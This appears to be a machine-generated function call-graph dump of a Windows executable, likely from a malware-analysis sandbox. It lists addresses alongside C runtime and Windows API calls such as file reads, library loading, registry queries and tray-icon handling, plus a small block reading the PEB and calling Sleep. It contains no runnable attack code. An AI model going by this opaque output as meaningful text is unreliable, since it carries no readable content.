101629->101574 101630->101564 101632 6cc5fe 101631->101632 101633 6cc600 IsProcessorFeaturePresent 101631->101633 101632->101541 101635 6d590a 101633->101635 101641 6d58b9 5 API calls 2 library calls 101635->101641 101637 6d59ed 101637->101541 101638->101612 101639->101615 101640->101612 101641->101637 101642->101465 101643->101467 101667 6cd4c3 101644->101667 101646 6d0aeb 101647 6d0b41 101646->101647 101649 6d0b1f 101646->101649 101652 6cd4c3 __close_nolock 58 API calls 101646->101652 101680 6cd43d 59 API calls __dosmaperr 101647->101680 101649->101647 101650 6cd4c3 __close_nolock 58 API calls 101649->101650 101653 6d0b2b CloseHandle 101650->101653 101651 6d0b49 101654 6d0b6b 101651->101654 101681 6c8b07 58 API calls __dosmaperr 101651->101681 101655 6d0b16 101652->101655 101653->101647 101657 6d0b37 GetLastError 101653->101657 101654->101492 101656 6cd4c3 __close_nolock 58 API calls 101655->101656 101656->101649 101657->101647 101659->101476 101660->101488 101661->101479 101662->101492 101663->101488 101664->101479 101665->101485 101666->101488 101668 6cd4ce 101667->101668 101670 6cd4e3 101667->101670 101682 6c8af4 58 API calls __getptd_noexit 101668->101682 101673 6cd508 101670->101673 101684 6c8af4 58 API calls __getptd_noexit 101670->101684 101672 6cd4d3 101683 6c8b28 58 API calls __getptd_noexit 101672->101683 101673->101646 101674 6cd512 101685 6c8b28 58 API calls __getptd_noexit 101674->101685 101677 6cd4db 101677->101646 101678 6cd51a 101686 6c8db6 9 API calls __write 101678->101686 101680->101651 101681->101654 101682->101672 101683->101677 101684->101674 101685->101678 101686->101677 101822 6a4bb5 101687->101822 101692 6a4e08 LoadLibraryExW 101832 6a4b6a 101692->101832 101693 6dd8e6 101694 6a4e4a 84 API calls 101693->101694 101696 6dd8ed 101694->101696 101698 6a4b6a 3 API calls 101696->101698 101700 6dd8f5 101698->101700 101858 6a4f0b 101700->101858 101701 6a4e2f 101701->101700 101702 6a4e3b 101701->101702 101703 6a4e4a 84 API calls 101702->101703 101705 6a4e40 101703->101705 101705->101301 101705->101304 101708 6dd91c 101866 6a4ec7 101708->101866 101712 70408d 101711->101712 101713 7040a0 101712->101713 101714 704092 101712->101714 101716 6a7667 59 API calls 101713->101716 101715 6a8047 59 API calls 101714->101715 101717 70409b Mailbox 101715->101717 101718 7040a8 101716->101718 101717->101356 101719 6a7667 59 API calls 101718->101719 101720 7040b0 101719->101720 101721 6a7667 59 API calls 101720->101721 101722 7040bb 101721->101722 101723 6a7667 59 API calls 101722->101723 101724 7040c3 101723->101724 101725 6a7667 59 API calls 101724->101725 101726 7040cb 101725->101726 101727 6a7667 59 API calls 101726->101727 101728 7040d3 101727->101728 101729 6a7667 59 API calls 101728->101729 101730 7040db 101729->101730 101766 709162 __write_nolock 101765->101766 101767 6c0db6 Mailbox 59 API calls 101766->101767 101768 7091bf 101767->101768 101769 6a522e 59 API calls 101768->101769 101770 7091c9 101769->101770 101771 708f5f GetSystemTimeAsFileTime 101770->101771 101820->101326 101821->101339 101871 6a4c03 101822->101871 101825 6a4bec FreeLibrary 101826 6a4bf5 101825->101826 101829 6c525b 101826->101829 101827 6a4c03 2 API calls 101828 6a4bdc 101827->101828 101828->101825 101828->101826 101875 6c5270 101829->101875 101831 6a4dfc 101831->101692 101831->101693 102033 6a4c36 101832->102033 101835 6a4baa 101839 6a4c70 101835->101839 101836 6a4ba1 FreeLibrary 101836->101835 101837 6a4c36 2 API calls 101838 6a4b8f 101837->101838 101838->101835 101838->101836 101840 6c0db6 Mailbox 59 API calls 101839->101840 101841 6a4c85 101840->101841 101842 6a522e 59 API calls 101841->101842 101843 6a4c91 _memmove 101842->101843 101844 6a4d89 101843->101844 101845 6a4dc1 101843->101845 101849 6a4ccc 101843->101849 102037 6a4e89 CreateStreamOnHGlobal 101844->102037 102048 70991b 95 API calls 101845->102048 101846 6a4ec7 69 API calls 101853 6a4cd5 101846->101853 101849->101846 101850 6a4f0b 74 API calls 101850->101853 101851 6a4d69 101851->101701 101853->101850 101853->101851 101854 6dd8a7 101853->101854 102043 6a4ee5 101853->102043 101855 6a4ee5 85 API calls 101854->101855 101856 6dd8bb 101855->101856 101857 6a4f0b 74 API calls 101856->101857 101857->101851 101859 6dd9cd 101858->101859 101860 6a4f1d 101858->101860 102066 6c55e2 101860->102066 101863 709109 102246 708f5f 101863->102246 101865 70911f 101865->101708 101867 6a4ed6 101866->101867 101868 6dd990 101866->101868 102251 6c5c60 101867->102251 101870 6a4ede 101872 6a4bd0 101871->101872 101873 6a4c0c LoadLibraryA 101871->101873 101872->101827 101872->101828 101873->101872 101874 6a4c1d GetProcAddress 101873->101874 101874->101872 101878 6c527c __freefls@4 101875->101878 101876 6c528f 101924 6c8b28 58 API calls __getptd_noexit 101876->101924 101878->101876 101880 6c52c0 101878->101880 101879 6c5294 101925 6c8db6 9 API calls __write 101879->101925 101894 6d04e8 101880->101894 101883 6c52c5 101884 6c52ce 101883->101884 101885 6c52db 101883->101885 101926 6c8b28 58 API calls __getptd_noexit 101884->101926 101886 6c5305 101885->101886 101887 6c52e5 101885->101887 101909 6d0607 101886->101909 101927 6c8b28 58 API calls __getptd_noexit 101887->101927 101891 6c529f @_EH4_CallFilterFunc@8 __freefls@4 101891->101831 101895 6d04f4 __freefls@4 101894->101895 101896 6c9c0b __lock 58 API calls 101895->101896 101897 6d0502 101896->101897 101898 6d057d 101897->101898 101903 6c9c93 __mtinitlocknum 58 API calls 101897->101903 101907 6d0576 101897->101907 101932 6c6c50 59 API calls __lock 101897->101932 101933 6c6cba LeaveCriticalSection LeaveCriticalSection _doexit 101897->101933 101934 6c881d 58 API calls 2 library calls 101898->101934 101901 6d0584 101901->101907 101935 6c9e2b InitializeCriticalSectionAndSpinCount 101901->101935 101903->101897 101905 6d05f3 __freefls@4 101905->101883 101906 6d05aa EnterCriticalSection 101906->101907 101929 6d05fe 101907->101929 101917 6d0627 __wopenfile 101909->101917 101910 6d0641 101940 6c8b28 58 API calls __getptd_noexit 101910->101940 101912 6d0646 101941 6c8db6 9 API calls __write 101912->101941 101914 6c5310 101928 6c5332 LeaveCriticalSection LeaveCriticalSection _fprintf 101914->101928 101915 6d085f 101937 6d85a1 101915->101937 101917->101910 101923 6d07fc 101917->101923 101942 6c37cb 60 API calls 3 library calls 101917->101942 101919 6d07f5 101919->101923 101943 6c37cb 60 API calls 3 library calls 101919->101943 101921 6d0814 101921->101923 101944 6c37cb 60 API calls 3 library calls 101921->101944 101923->101910 101923->101915 101924->101879 101925->101891 101926->101891 101927->101891 101928->101891 101936 6c9d75 LeaveCriticalSection 101929->101936 101931 6d0605 101931->101905 101932->101897 101933->101897 101934->101901 101935->101906 101936->101931 101945 6d7d85 101937->101945 101939 6d85ba 101939->101914 101940->101912 101941->101914 101942->101919 101943->101921 101944->101923 101948 6d7d91 __freefls@4 101945->101948 101946 6d7da7 102030 6c8b28 58 API calls __getptd_noexit 101946->102030 101948->101946 101950 6d7ddd 101948->101950 101949 6d7dac 102031 6c8db6 9 API calls __write 101949->102031 101956 6d7e4e 101950->101956 101953 6d7df9 102032 6d7e22 LeaveCriticalSection __unlock_fhandle 101953->102032 101955 6d7db6 __freefls@4 101955->101939 101957 6d7e6e 101956->101957 101958 6c44ea __wsopen_nolock 58 API calls 101957->101958 101960 6d7e8a 101958->101960 101959 6c8dc6 __invoke_watson 8 API calls 101961 6d85a0 101959->101961 101963 6d7ec4 101960->101963 101970 6d7ee7 101960->101970 101979 6d7fc1 101960->101979 101962 6d7d85 __wsopen_helper 103 API calls 101961->101962 101964 6d85ba 101962->101964 101965 6c8af4 __dosmaperr 58 API calls 101963->101965 101964->101953 101966 6d7ec9 101965->101966 101967 6c8b28 __dosmaperr 58 API calls 101966->101967 101968 6d7ed6 101967->101968 101971 6c8db6 __write 9 API calls 101968->101971 101969 6d7fa5 101972 6c8af4 __dosmaperr 58 API calls 101969->101972 101970->101969 101977 6d7f83 101970->101977 101973 6d7ee0 101971->101973 101974 6d7faa 101972->101974 101973->101953 101975 6c8b28 __dosmaperr 58 API calls 101974->101975 101976 6d7fb7 101975->101976 101978 6c8db6 __write 9 API calls 101976->101978 101980 6cd294 __alloc_osfhnd 61 API calls 101977->101980 101978->101979 101979->101959 101981 6d8051 101980->101981 101982 6d807e 101981->101982 101983 6d805b 101981->101983 101985 6d7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101982->101985 101984 6c8af4 __dosmaperr 58 API calls 101983->101984 101986 6d8060 101984->101986 101993 6d80a0 101985->101993 101987 6c8b28 __dosmaperr 58 API calls 101986->101987 101989 6d806a 101987->101989 101988 6d811e GetFileType 101990 6d8129 GetLastError 101988->101990 101991 6d816b 101988->101991 101995 6c8b28 __dosmaperr 58 API calls 101989->101995 101996 6c8b07 __dosmaperr 58 API calls 101990->101996 102001 6cd52a __set_osfhnd 59 API calls 101991->102001 101992 6d80ec GetLastError 101994 6c8b07 __dosmaperr 58 API calls 101992->101994 101993->101988 101993->101992 101997 6d7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101993->101997 101998 6d8111 101994->101998 101995->101973 101999 6d8150 CloseHandle 101996->101999 102000 6d80e1 101997->102000 102003 6c8b28 __dosmaperr 58 API calls 101998->102003 101999->101998 102002 6d815e 101999->102002 102000->101988 102000->101992 102007 6d8189 102001->102007 102004 6c8b28 __dosmaperr 58 API calls 102002->102004 102003->101979 102005 6d8163 102004->102005 102005->101998 102006 6d8344 102006->101979 102009 6d8517 CloseHandle 102006->102009 102007->102006 102008 6d18c1 __lseeki64_nolock 60 API calls 102007->102008 102026 6d820a 102007->102026 102010 6d81f3 102008->102010 102011 6d7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102009->102011 102013 6c8af4 __dosmaperr 58 API calls 102010->102013 102010->102026 102012 6d853e 102011->102012 102014 6d8572 102012->102014 102015 6d8546 GetLastError 102012->102015 102013->102026 102014->101979 102016 6c8b07 __dosmaperr 58 API calls 102015->102016 102020 6d8552 102016->102020 102017 6d0e5b 70 API calls __read_nolock 102017->102026 102018 6d0add __close_nolock 61 API calls 102018->102026 102019 6d823c 102021 6d97a2 __chsize_nolock 82 API calls 102019->102021 102019->102026 102022 6cd43d __free_osfhnd 59 API calls 102020->102022 102021->102019 102022->102014 102023 6cd886 __write 78 API calls 102023->102026 102024 6d83c1 102025 6d0add __close_nolock 61 API calls 102024->102025 102027 6d83c8 102025->102027 102026->102006 102026->102017 102026->102018 102026->102019 102026->102023 102026->102024 102028 6d18c1 60 API calls __lseeki64_nolock 102026->102028 102029 6c8b28 __dosmaperr 58 API calls 102027->102029 102028->102026 102029->101979 102030->101949 102031->101955 102032->101955 102034 6a4b83 102033->102034 102035 6a4c3f LoadLibraryA 102033->102035 102034->101837 102034->101838 102035->102034 102036 6a4c50 GetProcAddress 102035->102036 102036->102034 102038 6a4ea3 FindResourceExW 102037->102038 102042 6a4ec0 102037->102042 102039 6dd933 LoadResource 102038->102039 102038->102042 102040 6dd948 SizeofResource 102039->102040 102039->102042 102041 6dd95c LockResource 102040->102041 102040->102042 102041->102042 102042->101849 102044 6dd9ab 102043->102044 102045 6a4ef4 102043->102045 102049 6c584d 102045->102049 102047 6a4f02 102047->101853 102048->101849 102051 6c5859 __freefls@4 102049->102051 102050 6c586b 102062 6c8b28 58 API calls __getptd_noexit 102050->102062 102051->102050 102052 6c5891 102051->102052 102054 6c6c11 __lock_file 59 API calls 102052->102054 102056 6c5897 102054->102056 102055 6c5870 102063 6c8db6 9 API calls __write 102055->102063 102064 6c57be 83 API calls 5 library calls 102056->102064 102059 6c58a6 102065 6c58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102059->102065 102061 6c587b __freefls@4 102061->102047 102062->102055 102063->102061 102064->102059 102065->102061 102069 6c55fd 102066->102069 102068 6a4f2e 102068->101863 102070 6c5609 __freefls@4 102069->102070 102071 6c564c 102070->102071 102072 6c561f _memset 102070->102072 102073 6c5644 __freefls@4 102070->102073 102074 6c6c11 __lock_file 59 API calls 102071->102074 102096 6c8b28 58 API calls __getptd_noexit 102072->102096 102073->102068 102075 6c5652 102074->102075 102082 6c541d 102075->102082 102078 6c5639 102097 6c8db6 9 API calls __write 102078->102097 102085 6c5438 _memset 102082->102085 102088 6c5453 102082->102088 102083 6c5443 102187 6c8b28 58 API calls __getptd_noexit 102083->102187 102085->102083 102085->102088 102093 6c5493 102085->102093 102086 6c5448 102188 6c8db6 9 API calls __write 102086->102188 102098 6c5686 LeaveCriticalSection LeaveCriticalSection _fprintf 102088->102098 102090 6c55a4 _memset 102190 6c8b28 58 API calls __getptd_noexit 102090->102190 102091 6c46e6 __flswbuf 58 API calls 102091->102093 102093->102088 102093->102090 102093->102091 102099 6d0e5b 102093->102099 102167 6d0ba7 102093->102167 102189 6d0cc8 58 API calls 4 library calls 102093->102189 102096->102078 102097->102073 102098->102073 102100 6d0e7c 102099->102100 102101 6d0e93 102099->102101 102191 6c8af4 58 API calls __getptd_noexit 102100->102191 102102 6d15cb 102101->102102 102107 6d0ecd 102101->102107 102207 6c8af4 58 API calls __getptd_noexit 102102->102207 102105 6d0e81 102192 6c8b28 58 API calls __getptd_noexit 102105->102192 102109 6d0ed5 102107->102109 102116 6d0eec 102107->102116 102108 6d15d0 102208 6c8b28 58 API calls __getptd_noexit 102108->102208 102193 6c8af4 58 API calls __getptd_noexit 102109->102193 102112 6d0ee1 102209 6c8db6 9 API calls __write 102112->102209 102113 6d0e88 102113->102093 102114 6d0eda 102194 6c8b28 58 API calls __getptd_noexit 102114->102194 102116->102113 102117 6d0f01 102116->102117 102119 6d0f1b 102116->102119 102121 6d0f39 102116->102121 102195 6c8af4 58 API calls __getptd_noexit 102117->102195 102119->102117 102122 6d0f26 102119->102122 102196 6c881d 58 API calls 2 library calls 102121->102196 102124 6d5c6b __flswbuf 58 API calls 102122->102124 102126 6d103a 102124->102126 102125 6d0f49 102127 6d0f6c 102125->102127 102128 6d0f51 102125->102128 102129 6d10b3 ReadFile 102126->102129 102132 6d1050 GetConsoleMode 102126->102132 102199 6d18c1 60 API calls 2 library calls 102127->102199 102197 6c8b28 58 API calls __getptd_noexit 102128->102197 102133 6d10d5 102129->102133 102134 6d1593 GetLastError 102129->102134 102139 6d1064 102132->102139 102140 6d10b0 102132->102140 102133->102134 102141 6d10a5 102133->102141 102136 6d1093 102134->102136 102137 6d15a0 102134->102137 102135 6d0f56 102198 6c8af4 58 API calls __getptd_noexit 102135->102198 102149 6d1099 102136->102149 102200 6c8b07 58 API calls __dosmaperr 102136->102200 102205 6c8b28 58 API calls __getptd_noexit 102137->102205 102139->102140 102143 6d106a ReadConsoleW 102139->102143 102140->102129 102141->102149 102151 6d110a 102141->102151 102157 6d1377 102141->102157 102143->102141 102145 6d108d GetLastError 102143->102145 102144 6d15a5 102206 6c8af4 58 API calls __getptd_noexit 102144->102206 102145->102136 102148 6c2d55 _free 58 API calls 102148->102113 102149->102113 102149->102148 102152 6d1176 ReadFile 102151->102152 102160 6d11f7 102151->102160 102153 6d1197 GetLastError 102152->102153 102166 6d11a1 102152->102166 102153->102166 102154 6d12b4 102161 6d1264 MultiByteToWideChar 102154->102161 102203 6d18c1 60 API calls 2 library calls 102154->102203 102155 6d12a4 102202 6c8b28 58 API calls __getptd_noexit 102155->102202 102156 6d147d ReadFile 102159 6d14a0 GetLastError 102156->102159 102165 6d14ae 102156->102165 102157->102149 102157->102156 102159->102165 102160->102149 102160->102154 102160->102155 102160->102161 102161->102145 102161->102149 102165->102157 102204 6d18c1 60 API calls 2 library calls 102165->102204 102166->102151 102201 6d18c1 60 API calls 2 library calls 102166->102201 102168 6d0bb2 102167->102168 102171 6d0bc7 102167->102171 102243 6c8b28 58 API calls __getptd_noexit 102168->102243 102170 6d0bb7 102244 6c8db6 9 API calls __write 102170->102244 102173 6d0bfc 102171->102173 102178 6d0bc2 102171->102178 102245 6d5fe4 58 API calls __malloc_crt 102171->102245 102175 6c46e6 __flswbuf 58 API calls 102173->102175 102176 6d0c10 102175->102176 102210 6d0d47 102176->102210 102178->102093 102179 6d0c17 102179->102178 102180 6c46e6 __flswbuf 58 API calls 102179->102180 102181 6d0c3a 102180->102181 102181->102178 102182 6c46e6 __flswbuf 58 API calls 102181->102182 102183 6d0c46 102182->102183 102183->102178 102184 6c46e6 __flswbuf 58 API calls 102183->102184 102185 6d0c53 102184->102185 102186 6c46e6 __flswbuf 58 API calls 102185->102186 102186->102178 102187->102086 102188->102088 102189->102093 102190->102086 102191->102105 102192->102113 102193->102114 102194->102112 102195->102114 102196->102125 102197->102135 102198->102113 102199->102122 102200->102149 102201->102166 102202->102149 102203->102161 102204->102165 102205->102144 102206->102149 102207->102108 102208->102112 102209->102113 102211 6d0d53 __freefls@4 102210->102211 102212 6d0d77 102211->102212 102213 6d0d60 102211->102213 102215 6d0e3b 102212->102215 102218 6d0d8b 102212->102218 102214 6c8af4 __dosmaperr 58 API calls 102213->102214 102217 6d0d65 102214->102217 102216 6c8af4 __dosmaperr 58 API calls 102215->102216 102227 6d0dae 102216->102227 102219 6c8b28 __dosmaperr 58 API calls 102217->102219 102220 6d0da9 102218->102220 102221 6d0db6 102218->102221 102238 6d0d6c __freefls@4 102219->102238 102222 6c8af4 __dosmaperr 58 API calls 102220->102222 102223 6d0dd8 102221->102223 102224 6d0dc3 102221->102224 102222->102227 102225 6cd206 ___lock_fhandle 59 API calls 102223->102225 102228 6c8af4 __dosmaperr 58 API calls 102224->102228 102230 6d0dde 102225->102230 102226 6c8b28 __dosmaperr 58 API calls 102231 6d0dd0 102226->102231 102227->102226 102229 6d0dc8 102228->102229 102232 6c8b28 __dosmaperr 58 API calls 102229->102232 102233 6d0e04 102230->102233 102234 6d0df1 102230->102234 102236 6c8db6 __write 9 API calls 102231->102236 102232->102231 102237 6c8b28 __dosmaperr 58 API calls 102233->102237 102235 6d0e5b __read_nolock 70 API calls 102234->102235 102239 6d0dfd 102235->102239 102236->102238 102240 6d0e09 102237->102240 102238->102179 102242 6d0e33 __read LeaveCriticalSection 102239->102242 102241 6c8af4 __dosmaperr 58 API calls 102240->102241 102241->102239 102242->102238 102243->102170 102244->102178 102245->102173 102249 6c520a GetSystemTimeAsFileTime 102246->102249 102248 708f6e 102248->101865 102250 6c5238 __aulldiv 102249->102250 102250->102248 102252 6c5c6c __freefls@4 102251->102252 102253 6c5c7e 102252->102253 102254 6c5c93 102252->102254 102265 6c8b28 58 API calls __getptd_noexit 102253->102265 102256 6c6c11 __lock_file 59 API calls 102254->102256 102258 6c5c99 102256->102258 102257 6c5c83 102266 6c8db6 9 API calls __write 102257->102266 102267 6c58d0 67 API calls 6 library calls 102258->102267 102261 6c5ca4 102268 6c5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 102261->102268 102263 6c5cb6 102264 6c5c8e __freefls@4 102263->102264 102264->101870 102265->102257 102266->102264 102267->102261 102268->102263 102388 6f60cb 102387->102388 102389 6f60e8 102387->102389 102388->102389 102391 6f60ab 59 API calls Mailbox 102388->102391 102389->100802 102391->102388 102392->100812 102393 6ae5ab 102396 6ad100 102393->102396 102395 6ae5b9 102397 6ad11d 102396->102397 102425 6ad37d 102396->102425 102398 6e26e0 102397->102398 102399 6e2691 102397->102399 102429 6ad144 102397->102429 102447 71a3e6 341 API calls __cinit 102398->102447 102402 6e2694 102399->102402 102409 6e26af 102399->102409 102403 6e26a0 102402->102403 102402->102429 102445 71a9fa 341 API calls 102403->102445 102407 6ad54b 102407->102395 102408 6ad434 102436 6a8a52 68 API calls 102408->102436 102409->102425 102446 71aea2 341 API calls 3 library calls 102409->102446 102410 6e28b5 102410->102410 102414 6ad443 102414->102395 102415 6e27fc 102451 71a751 89 API calls 102415->102451 102425->102407 102452 709e4a 89 API calls 4 library calls 102425->102452 102426 6a9ea0 341 API calls 102426->102429 102427 6a8047 59 API calls 102427->102429 102429->102407 102429->102408 102429->102415 102429->102425 102429->102426 102429->102427 102430 6a8740 68 API calls __cinit 102429->102430 102431 6a8542 68 API calls 102429->102431 102432 6a84c0 102429->102432 102437 6a843a 68 API calls 102429->102437 102438 6acf7c 341 API calls 102429->102438 102439 6a9dda 59 API calls Mailbox 102429->102439 102440 6c2d40 102429->102440 102443 6acf00 89 API calls 102429->102443 102444 6acd7d 341 API calls 102429->102444 102448 6a8a52 68 API calls 102429->102448 102449 6a9d3c 60 API calls Mailbox 102429->102449 102450 6f678d 60 API calls 102429->102450 102430->102429 102431->102429 102433 6a84cb 102432->102433 102435 6a84f2 102433->102435 102453 6a89b3 69 API calls Mailbox 102433->102453 102435->102429 102436->102414 102437->102429 102438->102429 102439->102429 102454 6c2c44 102440->102454 102442 6c2d4b 102442->102429 102443->102429 102444->102429 102445->102407 102446->102425 102447->102429 102448->102429 102449->102429 102450->102429 102451->102425 102452->102410 102453->102435 102455 6c2c50 __freefls@4 102454->102455 102462 6c3217 102455->102462 102461 6c2c77 __freefls@4 102461->102442 102463 6c9c0b __lock 58 API calls 102462->102463 102464 6c2c59 102463->102464 102465 6c2c88 DecodePointer DecodePointer 102464->102465 102466 6c2cb5 102465->102466 102467 6c2c65 102465->102467 102466->102467 102479 6c87a4 59 API calls 2 library calls 102466->102479 102476 6c2c82 102467->102476 102469 6c2d18 EncodePointer EncodePointer 102469->102467 102470 6c2cc7 102470->102469 102471 6c2cec 102470->102471 102480 6c8864 61 API calls 2 library calls 102470->102480 102471->102467 102474 6c2d06 EncodePointer 102471->102474 102481 6c8864 61 API calls 2 library calls 102471->102481 102474->102469 102475 6c2d00 102475->102467 102475->102474 102482 6c3220 102476->102482 102479->102470 102480->102471 102481->102475 102485 6c9d75 LeaveCriticalSection 102482->102485 102484 6c2c87 102484->102461 102485->102484 102486 1e523b0 102500 1e50000 102486->102500 102488 1e5248d 102503 1e522a0 102488->102503 102506 1e534b0 GetPEB 102500->102506 102502 1e5068b 102502->102488 102504 1e522a9 Sleep 102503->102504 102505 1e522b7 102504->102505 102507 1e534da 102506->102507 102507->102502 102508 6a107d 102513 6a708b 102508->102513 102510 6a108c 102511 6c2d40 __cinit 67 API calls 102510->102511 102512 6a1096 102511->102512 102514 6a709b __write_nolock 102513->102514 102515 6a7667 59 API calls 102514->102515 102516 6a7151 102515->102516 102544 6a4706 102516->102544 102518 6a715a 102551 6c050b 102518->102551 102521 6a7cab 59 API calls 102522 6a7173 102521->102522 102557 6a3f74 102522->102557 102525 6a7667 59 API calls 102526 6a718b 102525->102526 102527 6a7d8c 59 API calls 102526->102527 102528 6a7194 RegOpenKeyExW 102527->102528 102529 6de8b1 RegQueryValueExW 102528->102529 102533 6a71b6 Mailbox 102528->102533 102530 6de8ce 102529->102530 102531 6de943 RegCloseKey 102529->102531 102532 6c0db6 Mailbox 59 API calls 102530->102532 102531->102533 102543 6de955 _wcscat Mailbox __NMSG_WRITE 102531->102543 102534 6de8e7 102532->102534 102533->102510 102535 6a522e 59 API calls 102534->102535 102536 6de8f2 RegQueryValueExW 102535->102536 102537 6de90f 102536->102537 102540 6de929 102536->102540 102538 6a7bcc 59 API calls 102537->102538 102538->102540 102539 6a79f2 59 API calls 102539->102543 102540->102531 102541 6a7de1 59 API calls 102541->102543 102542 6a3f74 59 API calls 102542->102543 102543->102533 102543->102539 102543->102541 102543->102542 102563 6d1940 102544->102563 102547 6a7de1 59 API calls 102548 6a4739 102547->102548 102565 6a4750 102548->102565 102550 6a4743 Mailbox 102550->102518 102552 6d1940 __write_nolock 102551->102552 102553 6c0518 GetFullPathNameW 102552->102553 102554 6c053a 102553->102554 102555 6a7bcc 59 API calls 102554->102555 102556 6a7165 102555->102556 102556->102521 102558 6a3f82 102557->102558 102562 6a3fa4 _memmove 102557->102562 102560 6c0db6 Mailbox 59 API calls 102558->102560 102559 6c0db6 Mailbox 59 API calls 102561 6a3fb8 102559->102561 102560->102562 102561->102525 102562->102559 102564 6a4713 GetModuleFileNameW 102563->102564 102564->102547 102566 6d1940 __write_nolock 102565->102566 102567 6a475d GetFullPathNameW 102566->102567 102568 6a4799 102567->102568 102569 6a477c 102567->102569 102570 6a7d8c 59 API calls 102568->102570 102571 6a7bcc 59 API calls 102569->102571 102572 6a4788 102570->102572 102571->102572 102575 6a7726 102572->102575 102576 6a7734 102575->102576 102577 6a7d2c 59 API calls 102576->102577 102578 6a4794 102577->102578 102578->102550 102579 6a3633 102580 6a366a 102579->102580 102581 6a3688 102580->102581 102582 6a36e7 102580->102582 102619 6a36e5 102580->102619 102586 6a374b PostQuitMessage 102581->102586 102587 6a3695 102581->102587 102584 6dd0cc 102582->102584 102585 6a36ed 102582->102585 102583 6a36ca DefWindowProcW 102621 6a36d8 102583->102621 102628 6b1070 10 API calls Mailbox 102584->102628 102588 6a36f2 102585->102588 102589 6a3715 SetTimer RegisterWindowMessageW 102585->102589 102586->102621 102591 6dd154 102587->102591 102592 6a36a0 102587->102592 102593 6dd06f 102588->102593 102594 6a36f9 KillTimer 102588->102594 102596 6a373e CreatePopupMenu 102589->102596 102589->102621 102644 702527 71 API calls _memset 102591->102644 102597 6a36a8 102592->102597 102598 6a3755 102592->102598 102600 6dd0a8 MoveWindow 102593->102600 102601 6dd074 102593->102601 102624 6a443a Shell_NotifyIconW _memset 102594->102624 102595 6dd0f3 102629 6b1093 341 API calls Mailbox 102595->102629 102596->102621 102604 6dd139 102597->102604 102605 6a36b3 102597->102605 102626 6a44a0 64 API calls _memset 102598->102626 102600->102621 102607 6dd078 102601->102607 102608 6dd097 SetFocus 102601->102608 102604->102583 102643 6f7c36 59 API calls Mailbox 102604->102643 102610 6dd124 102605->102610 102617 6a36be 102605->102617 102613 6dd081 102607->102613 102607->102617 102608->102621 102609 6a370c 102625 6a3114 DeleteObject DestroyWindow Mailbox 102609->102625 102642 702d36 81 API calls _memset 102610->102642 102611 6dd166 102611->102583 102611->102621 102612 6a3764 102612->102621 102627 6b1070 10 API calls Mailbox 102613->102627 102617->102583 102630 6a443a Shell_NotifyIconW _memset 102617->102630 102619->102583 102622 6dd118 102631 6a434a 102622->102631 102624->102609 102625->102621 102626->102612 102627->102621 102628->102595 102629->102617 102630->102622 102632 6a4375 _memset 102631->102632 102645 6a4182 102632->102645 102635 6a43fa 102637 6a4430 Shell_NotifyIconW 102635->102637 102638 6a4414 Shell_NotifyIconW 102635->102638 102639 6a4422 102637->102639 102638->102639 102649 6a407c 102639->102649 102641 6a4429 102641->102619 102642->102612 102643->102619 102644->102611 102646 6a4196 102645->102646 102647 6dd423 102645->102647 102646->102635 102671 702f94 62 API calls _W_store_winword 102646->102671 102647->102646 102648 6dd42c DestroyIcon 102647->102648 102648->102646 102650 6a4098 102649->102650 102651 6a416f Mailbox 102649->102651 102652 6a7a16 59 API calls 102650->102652 102651->102641 102653 6a40a6 102652->102653 102654 6dd3c8 LoadStringW 102653->102654 102655 6a40b3 102653->102655 102658 6dd3e2 102654->102658 102656 6a7bcc 59 API calls 102655->102656 102657 6a40c8 102656->102657 102657->102658 102659 6a40d9 102657->102659 102660 6a7b2e 59 API calls 102658->102660 102661 6a40e3 102659->102661 102662 6a4174 102659->102662 102665 6dd3ec 102660->102665 102663 6a7b2e 59 API calls 102661->102663 102664 6a8047 59 API calls 102662->102664 102668 6a40ed _memset _wcscpy 102663->102668 102664->102668 102666 6a7cab 59 API calls 102665->102666 102665->102668 102667 6dd40e 102666->102667 102670 6a7cab 59 API calls 102667->102670 102669 6a4155 Shell_NotifyIconW 102668->102669 102669->102651 102670->102668 102671->102635 102672 6c7c56 102673 6c7c62 __freefls@4 102672->102673 102709 6c9e08 GetStartupInfoW 102673->102709 102675 6c7c67 102711 6c8b7c GetProcessHeap 102675->102711 102677 6c7cbf 102678 6c7cca 102677->102678 102794 6c7da6 58 API calls 3 library calls 102677->102794 102712 6c9ae6 102678->102712 102681 6c7cd0 102682 6c7cdb __RTC_Initialize 102681->102682 102795 6c7da6 58 API calls 3 library calls 102681->102795 102733 6cd5d2 102682->102733 102685 6c7cea 102686 6c7cf6 GetCommandLineW 102685->102686 102796 6c7da6 58 API calls 3 library calls 102685->102796 102752 6d4f23 GetEnvironmentStringsW 102686->102752 102690 6c7cf5 102690->102686 102692 6c7d10 102693 6c7d1b 102692->102693 102797 6c30b5 58 API calls 3 library calls 102692->102797 102762 6d4d58 102693->102762 102696 6c7d21 102699 6c7d2c 102696->102699 102798 6c30b5 58 API calls 3 library calls 102696->102798 102776 6c30ef 102699->102776 102700 6c7d34 102701 6c7d3f __wwincmdln 102700->102701 102799 6c30b5 58 API calls 3 library calls 102700->102799 102782 6a47d0 102701->102782 102704 6c7d53 102705 6c7d62 102704->102705 102800 6c3358 58 API calls _doexit 102704->102800 102801 6c30e0 58 API calls _doexit 102705->102801 102708 6c7d67 __freefls@4 102710 6c9e1e 102709->102710 102710->102675 102711->102677 102802 6c3187 36 API calls 2 library calls 102712->102802 102714 6c9aeb 102803 6c9d3c InitializeCriticalSectionAndSpinCount __ioinit 102714->102803 102716 6c9af0 102717 6c9af4 102716->102717 102805 6c9d8a TlsAlloc 102716->102805 102804 6c9b5c 61 API calls 2 library calls 102717->102804 102720 6c9af9 102720->102681 102721 6c9b06 102721->102717 102722 6c9b11 102721->102722 102806 6c87d5 102722->102806 102725 6c9b53 102814 6c9b5c 61 API calls 2 library calls 102725->102814 102728 6c9b58 102728->102681 102729 6c9b32 102729->102725 102730 6c9b38 102729->102730 102813 6c9a33 58 API calls 4 library calls 102730->102813 102732 6c9b40 GetCurrentThreadId 102732->102681 102734 6cd5de __freefls@4 102733->102734 102735 6c9c0b __lock 58 API calls 102734->102735 102736 6cd5e5 102735->102736 102737 6c87d5 __calloc_crt 58 API calls 102736->102737 102738 6cd5f6 102737->102738 102739 6cd661 GetStartupInfoW 102738->102739 102740 6cd601 @_EH4_CallFilterFunc@8 __freefls@4 